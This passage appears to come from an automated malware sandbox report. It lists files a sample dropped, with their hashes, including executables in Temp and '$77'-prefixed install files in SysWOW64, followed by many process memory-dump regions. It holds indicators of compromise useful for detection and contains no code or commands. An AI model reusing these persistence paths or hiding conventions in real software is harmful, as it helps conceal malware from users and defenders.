                                                                      0886c03d4c406eaffc0f60fa04a7e89c3d84feeb969148efc3738200cfec889d0b09cfe1248dfbe064a9472b03726d8ae24b647bf37047758bf06682b5effd57

                                                                    • C:\Users\Admin\AppData\Local\Temp\3D2E.exe
                                                                      Filesize

                                                                      374KB

                                                                      MD5

                                                                      ee71f2a05c3b62cab2cc95fcf5d6f9d0

                                                                      SHA1

                                                                      4a7924019c35563c0c66fba54cfab7a1942ef586

                                                                      SHA256

                                                                      2342480b1c9e82199a6aafb571ff3925b8de83fe244beede4d478b31a5d1e15d

                                                                      SHA512

                                                                      a9eca6a3e7b6ea49a0db6f8ac2d3219cab48d80e42da7cefc944179512e03820d0a0ebf74428208265d9e2595449f5113d1c1d35d74867915ad1fc2d2a95b356

                                                                    • C:\Users\Admin\AppData\Local\Temp\3D2E.exe
                                                                      Filesize

                                                                      374KB

                                                                      MD5

                                                                      ee71f2a05c3b62cab2cc95fcf5d6f9d0

                                                                      SHA1

                                                                      4a7924019c35563c0c66fba54cfab7a1942ef586

                                                                      SHA256

                                                                      2342480b1c9e82199a6aafb571ff3925b8de83fe244beede4d478b31a5d1e15d

                                                                      SHA512

                                                                      a9eca6a3e7b6ea49a0db6f8ac2d3219cab48d80e42da7cefc944179512e03820d0a0ebf74428208265d9e2595449f5113d1c1d35d74867915ad1fc2d2a95b356

                                                                    • C:\Users\Admin\AppData\Local\Temp\bog923.exe.exe
                                                                      Filesize

                                                                      374KB

                                                                      MD5

                                                                      ee71f2a05c3b62cab2cc95fcf5d6f9d0

                                                                      SHA1

                                                                      4a7924019c35563c0c66fba54cfab7a1942ef586

                                                                      SHA256

                                                                      2342480b1c9e82199a6aafb571ff3925b8de83fe244beede4d478b31a5d1e15d

                                                                      SHA512

                                                                      a9eca6a3e7b6ea49a0db6f8ac2d3219cab48d80e42da7cefc944179512e03820d0a0ebf74428208265d9e2595449f5113d1c1d35d74867915ad1fc2d2a95b356

                                                                    • C:\Users\Admin\AppData\Local\Temp\gazypiva.exe
                                                                      Filesize

                                                                      10.7MB

                                                                      MD5

                                                                      69b5180803ec1fd17c71e451bb688bbd

                                                                      SHA1

                                                                      d4867c809219c5be0b076b3153310b05de81021c

                                                                      SHA256

                                                                      fc467b5872ce50d9abe0edd2267fea756a1b68076c53424afe52b0883738aed1

                                                                      SHA512

                                                                      cd3904d7992db839071e840d86da695704ec012b57a0ded111baf7966156b2f2f60873c8369248b955193849a63d0b5ef90951f3c3c43a14bba2d9003124cb65

                                                                    • C:\Users\Admin\AppData\Local\Temp\syst.exe
                                                                      Filesize

                                                                      117KB

                                                                      MD5

                                                                      6dd56c2df2d4de01cf93d923d4136ba7

                                                                      SHA1

                                                                      825d4f52bb1347019407a5192301fd9c0612f55d

                                                                      SHA256

                                                                      f57ace5c3adf5447bb4a8e4905a8c4001ada92954689743adb25931ab42fecf8

                                                                      SHA512

                                                                      a8dd5d3f693dd6ece444084043b9e8c5b2dfbf3f77589649fbb8e017f7f42736a84ccaa7218d87ffd02e7a9d66425a005ab4beb360a727fb06cba0eef7cb96c7

                                                                    • C:\Users\Admin\AppData\Local\Temp\syst.exe
                                                                      Filesize

                                                                      117KB

                                                                      MD5

                                                                      6dd56c2df2d4de01cf93d923d4136ba7

                                                                      SHA1

                                                                      825d4f52bb1347019407a5192301fd9c0612f55d

                                                                      SHA256

                                                                      f57ace5c3adf5447bb4a8e4905a8c4001ada92954689743adb25931ab42fecf8

                                                                      SHA512

                                                                      a8dd5d3f693dd6ece444084043b9e8c5b2dfbf3f77589649fbb8e017f7f42736a84ccaa7218d87ffd02e7a9d66425a005ab4beb360a727fb06cba0eef7cb96c7

                                                                    • C:\Windows\SysWOW64\$77Host.xml
                                                                      Filesize

                                                                      2KB

                                                                      MD5

                                                                      28d5a5d34b52beb9079783216a2a18ea

                                                                      SHA1

                                                                      67635e4a50cae5bddae6791034da43b67d1c9675

                                                                      SHA256

                                                                      83ec6af368a5fe3d399f9e35b8bcc119424e35d6d4379b904a64304491d84d01

                                                                      SHA512

                                                                      ded649184cf3f2cb07a22fcf78cc1f90221293c548d0ca2438c44c38553c59bfc8c24258dcf4ca1242bf6f3176e76fb7a7a799db7cbda88df39d9df25c3b2abb

                                                                    • C:\Windows\SysWOW64\$77Install.exe
                                                                      Filesize

                                                                      2.3MB

                                                                      MD5

                                                                      81b999918d94285ca5791aed3c8157fe

                                                                      SHA1

                                                                      2578c47353c13cf28468518c79ee5a035beed760

                                                                      SHA256

                                                                      5917eaf394a1ef0e1dc0cdb4a00260efbf51d1ea20d48ab68f7325cfe4b3ad04

                                                                      SHA512

                                                                      e7b92ccfe60142ea4e2605397104e5f0628c78431ff56a69a4868645b05444ece53679db26a724856f8c4c65d39017c51a467a27714b95f5aceee211ac70734e

                                                                    • C:\Windows\SysWOW64\grnjfouf\gazypiva.exe
                                                                      Filesize

                                                                      10.7MB

                                                                      MD5

                                                                      69b5180803ec1fd17c71e451bb688bbd

                                                                      SHA1

                                                                      d4867c809219c5be0b076b3153310b05de81021c

                                                                      SHA256

                                                                      fc467b5872ce50d9abe0edd2267fea756a1b68076c53424afe52b0883738aed1

                                                                      SHA512

                                                                      cd3904d7992db839071e840d86da695704ec012b57a0ded111baf7966156b2f2f60873c8369248b955193849a63d0b5ef90951f3c3c43a14bba2d9003124cb65

                                                                    • memory/112-265-0x0000000000C00000-0x0000000000CF1000-memory.dmp
                                                                      Filesize

                                                                      964KB

                                                                    • memory/112-260-0x0000000000C00000-0x0000000000CF1000-memory.dmp
                                                                      Filesize

                                                                      964KB

                                                                    • memory/112-259-0x0000000000000000-mapping.dmp
                                                                    • memory/608-319-0x00007FFF03F50000-0x00007FFF03F60000-memory.dmp
                                                                      Filesize

                                                                      64KB

                                                                    • memory/632-239-0x00000000012D0000-0x00000000012D8000-memory.dmp
                                                                      Filesize

                                                                      32KB

                                                                    • memory/632-235-0x0000000000000000-mapping.dmp
                                                                    • memory/632-240-0x00000000012C0000-0x00000000012CB000-memory.dmp
                                                                      Filesize

                                                                      44KB

                                                                    • memory/632-276-0x00000000012D0000-0x00000000012D8000-memory.dmp
                                                                      Filesize

                                                                      32KB

                                                                    • memory/656-320-0x00007FFF03F50000-0x00007FFF03F60000-memory.dmp
                                                                      Filesize

                                                                      64KB

                                                                    • memory/744-228-0x0000000000000000-mapping.dmp
                                                                    • memory/864-197-0x0000000005C60000-0x0000000006204000-memory.dmp
                                                                      Filesize

                                                                      5.6MB

                                                                    • memory/864-234-0x0000000006910000-0x000000000691A000-memory.dmp
                                                                      Filesize

                                                                      40KB

                                                                    • memory/864-199-0x00000000056B0000-0x000000000574C000-memory.dmp
                                                                      Filesize

                                                                      624KB

                                                                    • memory/864-194-0x0000000000480000-0x00000000004E4000-memory.dmp
                                                                      Filesize

                                                                      400KB

                                                                    • memory/864-191-0x0000000000000000-mapping.dmp
                                                                    • memory/1016-220-0x00000000008F0000-0x0000000000912000-memory.dmp
                                                                      Filesize

                                                                      136KB

                                                                    • memory/1016-219-0x0000000000000000-mapping.dmp
                                                                    • memory/1016-221-0x00000000008C0000-0x00000000008E7000-memory.dmp
                                                                      Filesize

                                                                      156KB

                                                                    • memory/1016-271-0x00000000008F0000-0x0000000000912000-memory.dmp
                                                                      Filesize

                                                                      136KB

                                                                    • memory/1256-231-0x0000000000000000-mapping.dmp
                                                                    • memory/1256-275-0x00000000005B0000-0x00000000005B7000-memory.dmp
                                                                      Filesize

                                                                      28KB

                                                                    • memory/1256-233-0x00000000005A0000-0x00000000005AD000-memory.dmp
                                                                      Filesize

                                                                      52KB

                                                                    • memory/1256-232-0x00000000005B0000-0x00000000005B7000-memory.dmp
                                                                      Filesize

                                                                      28KB

                                                                    • memory/1424-198-0x0000000000000000-mapping.dmp
                                                                    • memory/1424-203-0x0000000000990000-0x0000000000997000-memory.dmp
                                                                      Filesize

                                                                      28KB

                                                                    • memory/1424-204-0x0000000000980000-0x000000000098B000-memory.dmp
                                                                      Filesize

                                                                      44KB

                                                                    • memory/1424-266-0x0000000000990000-0x0000000000997000-memory.dmp
                                                                      Filesize

                                                                      28KB

                                                                    • memory/1556-272-0x0000000000A90000-0x0000000000A95000-memory.dmp
                                                                      Filesize

                                                                      20KB

                                                                    • memory/1556-222-0x0000000000000000-mapping.dmp
                                                                    • memory/1556-223-0x0000000000A90000-0x0000000000A95000-memory.dmp
                                                                      Filesize

                                                                      20KB

                                                                    • memory/1556-224-0x0000000000A80000-0x0000000000A89000-memory.dmp
                                                                      Filesize

                                                                      36KB

                                                                    • memory/1580-225-0x0000000000000000-mapping.dmp
                                                                    • memory/1580-226-0x00000000008D0000-0x00000000008D6000-memory.dmp
                                                                      Filesize

                                                                      24KB

                                                                    • memory/1580-227-0x00000000008C0000-0x00000000008CB000-memory.dmp
                                                                      Filesize

                                                                      44KB

                                                                    • memory/1580-273-0x00000000008D0000-0x00000000008D6000-memory.dmp
                                                                      Filesize

                                                                      24KB

                                                                    • memory/1696-270-0x0000000000000000-mapping.dmp
                                                                    • memory/3512-137-0x0000000000000000-mapping.dmp
                                                                    • memory/3592-211-0x0000000000DD0000-0x0000000000DDF000-memory.dmp
                                                                      Filesize

                                                                      60KB

                                                                    • memory/3592-209-0x0000000000DE0000-0x0000000000DE9000-memory.dmp
                                                                      Filesize

                                                                      36KB

                                                                    • memory/3592-267-0x0000000000DE0000-0x0000000000DE9000-memory.dmp
                                                                      Filesize

                                                                      36KB

                                                                    • memory/3592-205-0x0000000000000000-mapping.dmp
                                                                    • memory/3728-182-0x0000000000000000-mapping.dmp
                                                                    • memory/3776-135-0x00000000007B8000-0x00000000007C9000-memory.dmp
                                                                      Filesize

                                                                      68KB

                                                                    • memory/3776-136-0x0000000000400000-0x0000000000585000-memory.dmp
                                                                      Filesize

                                                                      1.5MB

                                                                    • memory/3776-133-0x0000000000720000-0x0000000000729000-memory.dmp
                                                                      Filesize

                                                                      36KB

                                                                    • memory/3776-134-0x0000000000400000-0x0000000000585000-memory.dmp
                                                                      Filesize

                                                                      1.5MB

                                                                    • memory/3776-132-0x00000000007B8000-0x00000000007C9000-memory.dmp
                                                                      Filesize

                                                                      68KB

                                                                    • memory/4080-236-0x0000000000000000-mapping.dmp
                                                                    • memory/4592-188-0x0000000000000000-mapping.dmp
                                                                    • memory/4592-196-0x0000000006250000-0x00000000062B6000-memory.dmp
                                                                      Filesize

                                                                      408KB

                                                                    • memory/4592-195-0x0000000006170000-0x00000000061D6000-memory.dmp
                                                                      Filesize

                                                                      408KB

                                                                    • memory/4592-210-0x0000000007ED0000-0x000000000854A000-memory.dmp
                                                                      Filesize

                                                                      6.5MB

                                                                    • memory/4592-190-0x0000000005AA0000-0x00000000060C8000-memory.dmp
                                                                      Filesize

                                                                      6.2MB

                                                                    • memory/4592-213-0x0000000006D80000-0x0000000006D9A000-memory.dmp
                                                                      Filesize

                                                                      104KB

                                                                    • memory/4592-200-0x0000000006870000-0x000000000688E000-memory.dmp
                                                                      Filesize

                                                                      120KB

                                                                    • memory/4592-189-0x00000000052B0000-0x00000000052E6000-memory.dmp
                                                                      Filesize

                                                                      216KB

                                                                    • memory/4736-218-0x0000000000F50000-0x0000000000F5C000-memory.dmp
                                                                      Filesize

                                                                      48KB

                                                                    • memory/4736-217-0x0000000000F60000-0x0000000000F66000-memory.dmp
                                                                      Filesize

                                                                      24KB

                                                                    • memory/4736-215-0x0000000000000000-mapping.dmp
                                                                    • memory/4736-269-0x0000000000F60000-0x0000000000F66000-memory.dmp
                                                                      Filesize

                                                                      24KB

                                                                    • memory/4792-216-0x00000000008D0000-0x00000000008D5000-memory.dmp
                                                                      Filesize

                                                                      20KB

                                                                    • memory/4792-208-0x0000000000000000-mapping.dmp
                                                                    • memory/4792-212-0x00000000008C0000-0x00000000008C9000-memory.dmp
                                                                      Filesize

                                                                      36KB

                                                                    • memory/4792-268-0x00000000008D0000-0x00000000008D5000-memory.dmp
                                                                      Filesize

                                                                      20KB

                                                                    • memory/5148-274-0x0000000000000000-mapping.dmp
                                                                    • memory/5240-277-0x0000000000000000-mapping.dmp
                                                                    • memory/5260-278-0x0000000000000000-mapping.dmp
                                                                    • memory/5284-280-0x0000000000000000-mapping.dmp
                                                                    • memory/5324-300-0x0000000077BF0000-0x0000000077D93000-memory.dmp
                                                                      Filesize

                                                                      1.6MB

                                                                    • memory/5332-285-0x00007FFF43ED0000-0x00007FFF440C5000-memory.dmp
                                                                      Filesize

                                                                      2.0MB

                                                                    • memory/5332-286-0x00007FFF42BB0000-0x00007FFF42C6E000-memory.dmp
                                                                      Filesize

                                                                      760KB

                                                                    • memory/5572-290-0x0000000140075238-mapping.dmp
                                                                    • memory/5572-288-0x0000000140000000-0x000000014033D000-memory.dmp
                                                                      Filesize

                                                                      3.2MB

                                                                    • memory/5572-291-0x0000000140000000-0x000000014033D000-memory.dmp
                                                                      Filesize

                                                                      3.2MB

                                                                    • memory/5572-292-0x0000000140000000-0x000000014033D000-memory.dmp
                                                                      Filesize

                                                                      3.2MB

                                                                    • memory/5572-294-0x00007FFF42BB0000-0x00007FFF42C6E000-memory.dmp
                                                                      Filesize

                                                                      760KB

                                                                    • memory/5572-293-0x00007FFF43ED0000-0x00007FFF440C5000-memory.dmp
                                                                      Filesize

                                                                      2.0MB

                                                                    • memory/5692-302-0x0000000000000000-mapping.dmp
                                                                    • memory/5692-303-0x0000000000400000-0x0000000000683000-memory.dmp
                                                                      Filesize

                                                                      2.5MB

                                                                    • memory/5692-304-0x0000000000400000-0x0000000000683000-memory.dmp
                                                                      Filesize

                                                                      2.5MB

                                                                    • memory/5692-305-0x0000000000400000-0x0000000000683000-memory.dmp
                                                                      Filesize

                                                                      2.5MB

                                                                    • memory/5692-306-0x0000000077BF0000-0x0000000077D93000-memory.dmp
                                                                      Filesize

                                                                      1.6MB

                                                                    • memory/37172-140-0x0000000000000000-mapping.dmp
                                                                    • memory/37172-175-0x0000000000859000-0x000000000086A000-memory.dmp
                                                                      Filesize

                                                                      68KB

                                                                    • memory/37172-149-0x0000000000859000-0x000000000086A000-memory.dmp
                                                                      Filesize

                                                                      68KB

                                                                    • memory/37172-150-0x00000000006F0000-0x0000000000703000-memory.dmp
                                                                      Filesize

                                                                      76KB

                                                                    • memory/37172-151-0x0000000000400000-0x0000000000585000-memory.dmp
                                                                      Filesize

                                                                      1.5MB

                                                                    • memory/37172-176-0x0000000000400000-0x0000000000585000-memory.dmp
                                                                      Filesize

                                                                      1.5MB

                                                                    • memory/64912-162-0x0000000000000000-mapping.dmp
                                                                    • memory/64952-214-0x0000000007590000-0x00000000075E0000-memory.dmp
                                                                      Filesize

                                                                      320KB

                                                                    • memory/64952-206-0x0000000007600000-0x00000000077C2000-memory.dmp
                                                                      Filesize

                                                                      1.8MB

                                                                    • memory/64952-163-0x0000000000000000-mapping.dmp
                                                                    • memory/64952-201-0x0000000007290000-0x0000000007306000-memory.dmp
                                                                      Filesize

                                                                      472KB

                                                                    • memory/64952-166-0x0000000000EA0000-0x0000000000F08000-memory.dmp
                                                                      Filesize

                                                                      416KB

                                                                    • memory/64952-202-0x0000000007320000-0x00000000073B2000-memory.dmp
                                                                      Filesize

                                                                      584KB

                                                                    • memory/64952-207-0x000000000B550000-0x000000000BA7C000-memory.dmp
                                                                      Filesize

                                                                      5.2MB

                                                                    • memory/65012-167-0x0000000000000000-mapping.dmp
                                                                    • memory/65120-171-0x0000000000CF0000-0x0000000000E14000-memory.dmp
                                                                      Filesize

                                                                      1.1MB

                                                                    • memory/65120-168-0x0000000000000000-mapping.dmp
                                                                    • memory/65120-187-0x0000000005820000-0x0000000005842000-memory.dmp
                                                                      Filesize

                                                                      136KB

                                                                    • memory/65164-172-0x0000000000000000-mapping.dmp
                                                                    • memory/65216-183-0x0000000000400000-0x0000000000585000-memory.dmp
                                                                      Filesize

                                                                      1.5MB

                                                                    • memory/65216-181-0x0000000000623000-0x0000000000634000-memory.dmp
                                                                      Filesize

                                                                      68KB

                                                                    • memory/65248-174-0x0000000000000000-mapping.dmp
                                                                    • memory/65320-158-0x00000000056E0000-0x00000000056F2000-memory.dmp
                                                                      Filesize

                                                                      72KB

                                                                    • memory/65320-160-0x0000000005740000-0x000000000577C000-memory.dmp
                                                                      Filesize

                                                                      240KB

                                                                    • memory/65320-143-0x0000000000000000-mapping.dmp
                                                                    • memory/65320-157-0x00000000057B0000-0x00000000058BA000-memory.dmp
                                                                      Filesize

                                                                      1.0MB

                                                                    • memory/65320-144-0x0000000000400000-0x0000000000428000-memory.dmp
                                                                      Filesize

                                                                      160KB

                                                                    • memory/65320-156-0x0000000005CA0000-0x00000000062B8000-memory.dmp
                                                                      Filesize

                                                                      6.1MB

                                                                    • memory/65344-178-0x0000000000CB0000-0x0000000000CC5000-memory.dmp
                                                                      Filesize

                                                                      84KB

                                                                    • memory/65344-241-0x0000000002800000-0x0000000002A0F000-memory.dmp
                                                                      Filesize

                                                                      2.1MB

                                                                    • memory/65344-177-0x0000000000000000-mapping.dmp
                                                                    • memory/65344-244-0x0000000001FE0000-0x0000000001FE6000-memory.dmp
                                                                      Filesize

                                                                      24KB

                                                                    • memory/65344-186-0x0000000000CB0000-0x0000000000CC5000-memory.dmp
                                                                      Filesize

                                                                      84KB

                                                                    • memory/65344-238-0x0000000000CB0000-0x0000000000CC5000-memory.dmp
                                                                      Filesize

                                                                      84KB

                                                                    • memory/65344-256-0x0000000002DE0000-0x0000000002DE7000-memory.dmp
                                                                      Filesize

                                                                      28KB

                                                                    • memory/65344-253-0x0000000007840000-0x0000000007C4B000-memory.dmp
                                                                      Filesize

                                                                      4.0MB

                                                                    • memory/65344-250-0x0000000002DD0000-0x0000000002DD5000-memory.dmp
                                                                      Filesize

                                                                      20KB

                                                                    • memory/65344-247-0x0000000001FF0000-0x0000000002000000-memory.dmp
                                                                      Filesize

                                                                      64KB

                                                                    • memory/65376-152-0x0000000000000000-mapping.dmp
                                                                    • memory/65444-155-0x0000000000000000-mapping.dmp
                                                                    • memory/65520-159-0x0000000000000000-mapping.dmp